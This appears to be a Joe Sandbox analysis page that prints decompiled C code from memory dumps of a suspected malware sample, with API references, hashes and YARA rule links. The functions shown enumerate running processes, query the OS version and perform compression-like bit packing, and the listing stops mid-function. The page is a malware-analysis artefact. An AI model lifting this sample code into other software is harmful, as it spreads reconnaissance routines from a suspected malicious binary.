Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Virtualmemcpy$AddressAllocFreeLibraryLoadProc
String ID:
API String ID: 4175162697-0
Opcode ID: 2496f43c1da21b99d92f3e18386f46f61b8d6f4dd5ae522561f272d2e0969c25
Instruction ID: 1db7323b6288da56b0562f2f18438e5f8678931e16dd6deca20e27d82ae77d02
Opcode Fuzzy Hash: 2496f43c1da21b99d92f3e18386f46f61b8d6f4dd5ae522561f272d2e0969c25
Instruction Fuzzy Hash: D8519EB1A003159FDB20DF5DC880BAAB7F9FF44318F284469E946E7242E771E956CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01382110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01382110(intOrPtr* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				intOrPtr* _t13;
				void* _t14;

				_t13 = __edx;
				_t5 = CreateToolhelp32Snapshot(2, 0);
				_t14 = _t5;
				if(_t14 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t14, _t6);
					if(_t6 == 0) {
						L5:
						return CloseHandle(_t14);
					}
					do {
					} while (E01388B30( &_v560, _t13) != 0 && Process32NextW(_t14,  &_v560) != 0);
					goto L5;
				}
				return _t5;
			}

0x0138211f
0x01382121
0x01382127
0x0138212c
0x0138212e
0x01382134
0x01382140
0x01382148
0x01382173
0x00000000
0x01382174
0x01382150
0x0138215d
0x00000000
0x01382150
0x0138217f

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01382121
Process32FirstW.KERNEL32(00000000,?), ref: 01382140
CloseHandle.KERNEL32(00000000,?,?), ref: 01382174

Part of subcall function 01388B30: GetCurrentProcessId.KERNEL32(00000000,00000000,?,0138215D,0000022C,00000000,?,?), ref: 01388B47
Part of subcall function 01388B30: GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,0138215D,0000022C,00000000,?,?), ref: 01388B75
Part of subcall function 01388B30: RtlAllocateHeap.NTDLL(00000000,?,0138215D), ref: 01388B7C
Part of subcall function 01388B30: lstrcpyW.KERNEL32(00000004,?), ref: 01388B8F

Process32NextW.KERNEL32(00000000,0000022C), ref: 01382169

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: HeapProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 3893281644-0
Opcode ID: bc6aa92f0d8ed49bd531c970b0127c733b6af4d9327265a7a5c7ea1512b5622a
Instruction ID: 23d267d7e1638304815b69eed61de1868dc79d3812e1a431f46f74c394999394
Opcode Fuzzy Hash: bc6aa92f0d8ed49bd531c970b0127c733b6af4d9327265a7a5c7ea1512b5622a
Instruction Fuzzy Hash: 12F04F795013146AE720ABB9BC4CBEF7AACAB89754F2441A5EE04D2184E7309505CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01386E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E01386E70(intOrPtr* __ecx, intOrPtr __edx) {
				int _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t274;
				signed char _t282;
				int _t285;
				intOrPtr _t286;
				intOrPtr _t294;
				signed int _t304;
				signed char _t308;
				signed char _t311;
				signed char _t320;
				signed char _t331;
				signed char _t334;
				signed char _t340;
				signed char _t352;
				signed char _t355;
				signed int _t364;
				void* _t366;
				int _t367;
				signed char _t370;
				intOrPtr _t371;
				signed char _t374;
				signed char _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				char* _t379;
				signed char _t380;
				char* _t381;
				char* _t382;
				signed char _t385;
				signed char _t386;
				signed char _t387;
				char* _t388;
				char* _t389;
				char* _t390;
				char* _t391;
				char* _t396;
				signed char _t397;
				signed char _t398;
				char* _t399;
				char* _t400;
				intOrPtr _t401;
				intOrPtr _t402;
				signed int _t403;
				void* _t404;
				void* _t405;
				signed int _t406;
				void* _t407;
				int _t408;
				intOrPtr _t409;
				int _t412;
				signed int _t413;
				void* _t414;
				intOrPtr* _t415;
				void* _t416;

				_t402 = __edx;
				_t415 = __ecx;
				_v24 = __edx;
				_v12 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0) {
					L2:
					_v8 = 0;
				} else {
					_v8 = 1;
					if( *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
						goto L2;
					}
				}
				if( *_t415 != 0) {
					L6:
					_t274 = _t415 + 0x39272;
				} else {
					_t401 =  *((intOrPtr*)(_t415 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t401 < 0x14ccc) {
						goto L6;
					} else {
						_t274 =  *((intOrPtr*)(_t415 + 0x74)) + _t401;
					}
				}
				 *((intOrPtr*)(_t415 + 0x30)) = _t274;
				_v20 = _t274;
				 *((intOrPtr*)(_t415 + 0x34)) = _t274 + 0x14cbc;
				 *(_t415 + 0x58) = 0;
				 *(_t415 + 0x5c) = 0;
				 *( *(_t415 + 0x2c)) =  *( *(_t415 + 0x2c)) >>  *(_t415 + 0x38);
				 *((intOrPtr*)(_t415 + 0x28)) =  *((intOrPtr*)(_t415 + 0x28)) - (0 |  *(_t415 + 0x38) == 0x00000008);
				if(( *(_t415 + 8) & 0x00001000) != 0 &&  *((intOrPtr*)(_t415 + 0x64)) == 0) {
					_t397 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000078 << _t397;
					_t352 = _t397 + 8;
					 *(_t415 + 0x44) = _t352;
					if(_t352 >= 8) {
						do {
							_t400 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t400 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t400 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
					_t398 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000001 << _t398;
					_t49 = _t398 + 8; // 0x10
					_t355 = _t49;
					 *(_t415 + 0x44) = _t355;
					if(_t355 >= 8) {
						do {
							_t399 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t399 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t399 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
				}
				_t370 =  *(_t415 + 0x44);
				 *(_t415 + 0x48) =  *(_t415 + 0x48) | (0 | _t402 == 0x00000004) << _t370;
				_t66 = _t370 + 1; // 0x9
				_t282 = _t66;
				 *(_t415 + 0x44) = _t282;
				if(_t282 >= 8) {
					do {
						_t396 =  *((intOrPtr*)(_t415 + 0x30));
						if(_t396 <  *((intOrPtr*)(_t415 + 0x34))) {
							 *_t396 =  *(_t415 + 0x48);
							 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
						}
						 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
						 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
					} while ( *(_t415 + 0x44) >= 8);
				}
				_t403 =  *(_t415 + 0x48);
				_t409 =  *((intOrPtr*)(_t415 + 0x30));
				_t364 =  *(_t415 + 0x44);
				_v16 = _t403;
				if(_v8 != 0) {
					L31:
					if( *((intOrPtr*)(_t415 + 0x1c)) -  *((intOrPtr*)(_t415 + 0x40)) >  *((intOrPtr*)(_t415 + 0x24))) {
						_t285 = _v12;
						goto L58;
					} else {
						 *((intOrPtr*)(_t415 + 0x30)) = _t409;
						 *(_t415 + 0x48) = 0 << _t364 | _t403;
						_t331 = _t364 + 2;
						 *(_t415 + 0x44) = _t331;
						if(_t331 >= 8) {
							do {
								_t391 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t391 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t391 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t385 =  *(_t415 + 0x44);
						if(_t385 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t385;
							do {
								_t390 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t390 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t390 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t407 = 2;
						do {
							_t386 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(_t415 + 0x3c) & 0x0000ffff) << _t386;
							_t126 = _t386 + 0x10; // 0x18
							_t334 = _t126;
							 *(_t415 + 0x44) = _t334;
							if(_t334 >= 8) {
								do {
									_t389 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t389 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t389 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							 *(_t415 + 0x3c) =  *(_t415 + 0x3c) ^ 0x0000ffff;
							_t407 = _t407 - 1;
						} while (_t407 != 0);
						if( *(_t415 + 0x3c) > _t407) {
							do {
								_t387 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(( *((intOrPtr*)(_t415 + 0x40)) + _t407 & 0x00007fff) + _t415 + 0x90) & 0x000000ff) << _t387;
								_t147 = _t387 + 8; // 0x10
								_t340 = _t147;
								 *(_t415 + 0x44) = _t340;
								if(_t340 >= 8) {
									do {
										_t388 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t388 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t407 = _t407 + 1;
							} while (_t407 <  *(_t415 + 0x3c));
						}
					}
				} else {
					if(( *(_t415 + 8) & 0x00040000) != 0 ||  *(_t415 + 0x3c) < 0x30) {
						E01386A80(_t415);
					} else {
						E01385B10(_t415);
					}
					_t416 = _t416 + 4;
					_t285 = E01386C30(_t415);
					_t408 =  *(_t415 + 0x3c);
					_v12 = _t285;
					if(_t408 == 0 ||  *((intOrPtr*)(_t415 + 0x30)) - _t409 + 1 < _t408) {
						L58:
						if(_t285 == 0) {
							 *((intOrPtr*)(_t415 + 0x30)) = _t409;
							 *(_t415 + 0x48) = _v16;
							 *(_t415 + 0x44) = _t364;
							E01386A80(_t415);
							_t416 = _t416 + 4;
							E01386C30(_t415);
						}
					} else {
						_t403 = _v16;
						goto L31;
					}
				}
				_t286 = _v24;
				if(_t286 != 0) {
					_t374 =  *(_t415 + 0x44);
					if(_t286 != 4) {
						_t413 = 0;
						 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
						_t308 = _t374 + 3;
						 *(_t415 + 0x44) = _t308;
						if(_t308 >= 8) {
							do {
								_t379 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t379 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t379 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t375 =  *(_t415 + 0x44);
						if(_t375 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t375;
							do {
								_t378 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t378 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t378 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t405 = 2;
						do {
							_t376 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | (_t413 & 0x0000ffff) << _t376;
							_t230 = _t376 + 0x10; // 0x18
							_t311 = _t230;
							 *(_t415 + 0x44) = _t311;
							if(_t311 >= 8) {
								do {
									_t377 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t377 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t377 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							_t413 = _t413 ^ 0x0000ffff;
							_t405 = _t405 - 1;
						} while (_t405 != 0);
					} else {
						if(_t374 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
							do {
								_t382 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t382 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t382 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						if(( *(_t415 + 8) & 0x00001000) != 0) {
							_t406 =  *(_t415 + 0x18);
							_t414 = 4;
							do {
								_t380 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | _t406 >> 0x00000018 << _t380;
								_t187 = _t380 + 8; // 0x10
								_t320 = _t187;
								 *(_t415 + 0x44) = _t320;
								if(_t320 >= 8) {
									do {
										_t381 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t381 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t381 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t406 = _t406 << 8;
								_t414 = _t414 - 1;
							} while (_t414 != 0);
						}
					}
				}
				memset(_t415 + 0x8192, 0, 0x240);
				memset(_t415 + 0x83d2, 0, 0x40);
				 *((intOrPtr*)(_t415 + 0x64)) =  *((intOrPtr*)(_t415 + 0x64)) + 1;
				 *((intOrPtr*)(_t415 + 0x28)) = _t415 + 0x9273;
				 *(_t415 + 0x2c) = _t415 + 0x9272;
				 *((intOrPtr*)(_t415 + 0x40)) =  *((intOrPtr*)(_t415 + 0x40)) +  *(_t415 + 0x3c);
				_t294 = _v20;
				 *(_t415 + 0x38) = 8;
				 *(_t415 + 0x3c) = 0;
				_t366 =  *((intOrPtr*)(_t415 + 0x30)) - _t294;
				if(_t366 == 0) {
					L98:
					return  *(_t415 + 0x5c);
				} else {
					if( *_t415 == 0) {
						_t404 = _t415 + 0x39272;
						if(_t294 != _t404) {
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t366;
							goto L98;
						} else {
							_t371 =  *((intOrPtr*)(_t415 + 0x8c));
							_t412 =  <  ? _t366 :  *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t371;
							memcpy( *((intOrPtr*)(_t415 + 0x74)) + _t371, _t404, _t412);
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t412;
							_t367 = _t366 - _t412;
							if(_t367 == 0) {
								goto L98;
							} else {
								 *(_t415 + 0x58) = _t412;
								 *(_t415 + 0x5c) = _t367;
								return _t367;
							}
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x78)))) =  *((intOrPtr*)(_t415 + 0x84)) -  *((intOrPtr*)(_t415 + 0x70));
						_t304 =  *((intOrPtr*)( *_t415))(_t415 + 0x39272, _t366,  *((intOrPtr*)(_t415 + 4)));
						if(_t304 != 0) {
							goto L98;
						} else {
							 *((intOrPtr*)(_t415 + 0x6c)) = 0xffffffff;
							return _t304 | 0xffffffff;
						}
					}
				}
			}

0x01386e70
0x01386e78
0x01386e7a
0x01386e7e
0x01386e8c
0x01386ea0
0x01386ea0
0x01386e8e
0x01386e94
0x01386e9e
0x00000000
0x00000000
0x01386e9e
0x01386eaa
0x01386ec7
0x01386ec7
0x01386eac
0x01386eaf
0x01386ebe
0x00000000
0x01386ec0
0x01386ec3
0x01386ec3
0x01386ebe
0x01386ed0
0x01386ed3
0x01386edb
0x01386ee1
0x01386ee8
0x01386eef
0x01386efa
0x01386f04
0x01386f0c
0x01386f16
0x01386f19
0x01386f1c
0x01386f22
0x01386f24
0x01386f24
0x01386f2a
0x01386f2f
0x01386f31
0x01386f31
0x01386f34
0x01386f38
0x01386f3c
0x01386f24
0x01386f42
0x01386f4c
0x01386f4f
0x01386f4f
0x01386f52
0x01386f58
0x01386f60
0x01386f60
0x01386f66
0x01386f6b
0x01386f6d
0x01386f6d
0x01386f70
0x01386f74
0x01386f78
0x01386f60
0x01386f58
0x01386f7e
0x01386f8b
0x01386f8e
0x01386f8e
0x01386f91
0x01386f97
0x01386fa0
0x01386fa0
0x01386fa6
0x01386fab
0x01386fad
0x01386fad
0x01386fb0
0x01386fb4
0x01386fb8
0x01386fa0
0x01386fc2
0x01386fc5
0x01386fc8
0x01386fcb
0x01386fce
0x01387016
0x0138701f
0x0138712b
0x00000000
0x01387025
0x01387027
0x01387030
0x01387033
0x01387036
0x0138703c
0x01387040
0x01387040
0x01387046
0x0138704b
0x0138704d
0x0138704d
0x01387050
0x01387054
0x01387058
0x01387040
0x0138705e
0x01387063
0x01387067
0x01387070
0x01387073
0x01387073
0x01387079
0x0138707e
0x01387080
0x01387080
0x01387083
0x01387087
0x0138708b
0x01387073
0x01387091
0x01387096
0x01387096
0x0138709f
0x013870a2
0x013870a2
0x013870a5
0x013870ab
0x013870b0
0x013870b0
0x013870b6
0x013870bb
0x013870bd
0x013870bd
0x013870c0
0x013870c4
0x013870c8
0x013870b0
0x013870ce
0x013870d5
0x013870d5
0x013870db
0x013870e0
0x013870e3
0x013870f7
0x013870fa
0x013870fa
0x013870fd
0x01387103
0x01387105
0x01387105
0x0138710b
0x01387110
0x01387112
0x01387112
0x01387115
0x01387119
0x0138711d
0x01387105
0x01387123
0x01387124
0x01387129
0x013870db
0x01386fd0
0x01386fd7
0x01386fe8
0x01386fdf
0x01386fe0
0x01386fe0
0x01386fed
0x01386ff2
0x01386ff7
0x01386ffa
0x01386fff
0x0138712e
0x01387130
0x01387136
0x01387139
0x0138713c
0x0138713f
0x01387144
0x01387149
0x01387149
0x01387013
0x01387013
0x00000000
0x01387013
0x01386fff
0x0138714e
0x01387153
0x01387159
0x0138715f
0x013871f3
0x013871f7
0x013871fa
0x013871fd
0x01387203
0x01387205
0x01387205
0x0138720b
0x01387210
0x01387212
0x01387212
0x01387215
0x01387219
0x0138721d
0x01387205
0x01387223
0x01387228
0x0138722c
0x01387235
0x01387238
0x01387238
0x0138723e
0x01387243
0x01387245
0x01387245
0x01387248
0x0138724c
0x01387250
0x01387238
0x01387256
0x01387260
0x01387260
0x01387268
0x0138726b
0x0138726b
0x0138726e
0x01387274
0x01387276
0x01387276
0x0138727c
0x01387281
0x01387283
0x01387283
0x01387286
0x0138728a
0x0138728e
0x01387276
0x01387294
0x0138729a
0x0138729a
0x01387165
0x01387167
0x0138716b
0x01387174
0x01387177
0x01387177
0x0138717d
0x01387182
0x01387184
0x01387184
0x01387187
0x0138718b
0x0138718f
0x01387177
0x0138719c
0x013871a2
0x013871a5
0x013871b0
0x013871b0
0x013871ba
0x013871bd
0x013871bd
0x013871c0
0x013871c6
0x013871c8
0x013871c8
0x013871ce
0x013871d3
0x013871d5
0x013871d5
0x013871d8
0x013871dc
0x013871e0
0x013871c8
0x013871e6
0x013871e9
0x013871e9
0x013871ec
0x0138719c
0x0138715f
0x013872ab
0x013872bc
0x013872cb
0x013872d1
0x013872da
0x013872e0
0x013872e3
0x013872e6
0x013872ed
0x013872f4
0x013872f6
0x01387382
0x0138738b
0x013872fc
0x013872ff
0x01387336
0x0138733e
0x0138737c
0x00000000
0x01387340
0x01387343
0x01387352
0x0138735a
0x01387360
0x01387369
0x0138736b
0x00000000
0x0138736d
0x0138736d
0x01387373
0x0138737b
0x0138737b
0x0138736b
0x01387301
0x0138730d
0x0138731c
0x01387323
0x00000000
0x01387326
0x01387326
0x01387335
0x01387335
0x01387323
0x013872ff

APIs

memset.NTDLL ref: 013872AB
memset.NTDLL ref: 013872BC

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: e84141946dbefa1f75464018f9c7ea7134a22ca544491531a25b0a968ffe7bc6
Instruction ID: 0a26b9840b70a68d72e73f49ec33ed3a7cab3d73d35aff6ea3987398cc370506
Opcode Fuzzy Hash: e84141946dbefa1f75464018f9c7ea7134a22ca544491531a25b0a968ffe7bc6
Instruction Fuzzy Hash: 4C026370511B108FDB36DF29C684666BBF2FF45628B640A2EC6E786EA1D336F445CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01388D50, Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL(?), ref: 01388D6D
GetNativeSystemInfo.KERNEL32(?), ref: 01388D77

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: 07fcb3418a5cfda6ec33b4d1a6faa7dfe4b4193b2d589aba70e51629639a07aa
Instruction ID: 1bd34d36b541a7ba03c149201a2857143140c88194703442908112e8dbae008c
Opcode Fuzzy Hash: 07fcb3418a5cfda6ec33b4d1a6faa7dfe4b4193b2d589aba70e51629639a07aa
Instruction Fuzzy Hash: ACF03132D106184BF761CF6ACC456CCB7F9E788304F0481A0E42DF6609D6B4EA15DB50

Uniqueness

Uniqueness Score: -1.00%

Function 013877F0, Relevance: .6, Instructions: 581
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E013877F0(intOrPtr* __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t390;
				void* _t402;
				signed int _t410;
				unsigned int* _t411;
				unsigned int* _t420;
				signed int _t432;
				unsigned int* _t434;
				unsigned int* _t451;
				unsigned int* _t453;
				void* _t463;
				void* _t480;
				signed int _t483;
				signed int _t494;
				signed char _t504;
				signed int _t508;
				signed int _t509;
				signed char _t510;
				signed int _t511;
				signed int _t513;
				signed int _t514;
				intOrPtr* _t516;
				intOrPtr* _t517;
				intOrPtr _t520;
				intOrPtr _t522;
				intOrPtr _t523;
				signed int _t524;
				signed int _t528;
				signed char* _t531;
				void* _t534;
				signed char _t538;
				signed char _t543;
				void* _t548;
				void* _t550;
				intOrPtr* _t551;
				intOrPtr _t555;
				intOrPtr _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				signed int _t564;
				intOrPtr* _t567;
				intOrPtr* _t571;
				intOrPtr _t572;
				signed int _t573;
				signed int _t575;
				signed int _t576;
				signed int _t579;
				signed int _t582;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				void* _t594;
				signed int _t595;
				signed int _t600;
				intOrPtr _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				intOrPtr* _t612;

				_t612 = __ecx;
				_v76 = __ecx;
				_t571 =  *((intOrPtr*)(__ecx + 0x84));
				_t601 =  *((intOrPtr*)(__ecx + 0x88));
				_t375 =  *((intOrPtr*)(__ecx + 0x80));
				_v12 = _t571;
				_v20 = _t601;
				_v48 = _t375;
				L2:
				while(_t601 != 0 || _t375 != 0 &&  *((intOrPtr*)(_t612 + 0x20)) != _t601) {
					_t520 =  *((intOrPtr*)(_t612 + 0x20));
					if( *((intOrPtr*)(_t612 + 0x24)) + _t520 < 2) {
						if(_t601 != 0) {
							while(1) {
								_t557 =  *((intOrPtr*)(_t612 + 0x20));
								if(_t557 >= 0x102) {
									goto L11;
								}
								_t601 = _t601 - 1;
								_t510 =  *_t571;
								_t483 =  *(_t612 + 0x1c) + _t557 & 0x00007fff;
								_v20 = _t601;
								_t571 = _t571 + 1;
								_v12 = _t571;
								 *(_t483 + _t612 + 0x90) = _t510;
								if(_t483 < 0x101) {
									 *(_t483 + _t612 + 0x8090) = _t510;
								}
								 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) + 1;
								_t558 =  *((intOrPtr*)(_t612 + 0x20));
								if( *((intOrPtr*)(_t612 + 0x24)) + _t558 >= 3) {
									_t608 =  *(_t612 + 0x1c) + _t558 + 0xfffffffd;
									_t579 = _t608 & 0x00007fff;
									_t89 = _t608 + 1; // 0x11
									_t564 = (( *(_t579 + _t612 + 0x90) & 0x000000ff) << 0x0000000a ^ _t510 & 0x000000ff) & 0x00007fff ^ ( *((_t89 & 0x00007fff) + _t612 + 0x90) & 0xff) << 0x00000005;
									 *((short*)(_t612 + 0x19272 + _t579 * 2)) =  *(_t612 + 0x29272 + _t564 * 2);
									_t571 = _v12;
									 *(_t612 + 0x29272 + _t564 * 2) = _t608;
									_t601 = _v20;
								}
								if(_t601 != 0) {
									continue;
								} else {
								}
								goto L11;
							}
						}
					} else {
						_t494 =  *(_t612 + 0x1c) + _t520;
						_t610 = _t494 & 0x00007fff;
						_t13 = _t494 - 2; // 0xe
						_t511 = _t13;
						_t16 = _t511 + 1; // 0xf
						_t582 = ( *((_t511 & 0x00007fff) + _t612 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t16 & 0x00007fff) + _t612 + 0x90) & 0x000000ff;
